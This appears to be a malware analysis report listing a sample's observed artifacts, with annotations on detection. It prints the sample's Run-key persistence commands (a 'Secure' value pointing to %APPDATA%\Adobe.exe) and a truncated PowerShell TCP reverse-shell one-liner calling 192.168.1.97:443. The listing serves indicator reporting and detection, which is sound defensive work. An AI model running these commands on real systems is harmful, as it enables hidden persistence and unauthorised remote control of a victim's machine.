Technical Information (observed artifacts: Run-key persistence entry, dropped file path, network endpoint, and the command lines the sample executed)
- [<HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'Secure' = '%APPDATA%\Adobe.exe' (user-level persistence; this is the value written by the REG ADD command lines below — the value name "Secure" and an "Adobe.exe" placed directly in %APPDATA% are the detection hooks)
- %APPDATA%\<File name>.exe
- '<LOCALNET>.1.97':443 (appears unredacted as 192.168.1.97 in the PowerShell command lines below; this is an RFC 1918 private address, so the sample connects back to a host on the victim's local network — it is not an Internet-routable C2 indicator to block, and is presumably a lab or staging address)
- '<SYSTEM32>\cmd.exe' /c copy <Full path to file> %appdata%' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c copy <Full path to file> %appdata%
- '<SYSTEM32>\cmd.exe' /c cmd /c REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V "Secure" /t REG_SZ /F /D "%appdata%\Adobe.exe
- '<SYSTEM32>\cmd.exe' /c REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V "Secure" /t REG_SZ /F /D "%APPDATA%\Adobe.exe
- '<SYSTEM32>\reg.exe' ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V "Secure" /t REG_SZ /F /D "%APPDATA%\Adobe.exe
- '<SYSTEM32>\cmd.exe' /c powershell.exe -c "$client = New-Object System.Net.Sockets.TCPClient('192.168.1.97',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $byt...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -c "$client = New-Object System.Net.Sockets.TCPClient('192.168.1.97',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)... (truncated in the report; the visible fragment — TCPClient to 192.168.1.97:443, GetStream, a 65536-byte buffer and a Read loop — matches the well-known PowerShell TCP reverse-shell one-liner, which presumably continues by executing the received bytes and writing the output back to the socket; treat a cmd.exe → powershell.exe -c process chain containing New-Object System.Net.Sockets.TCPClient as a high-confidence detection)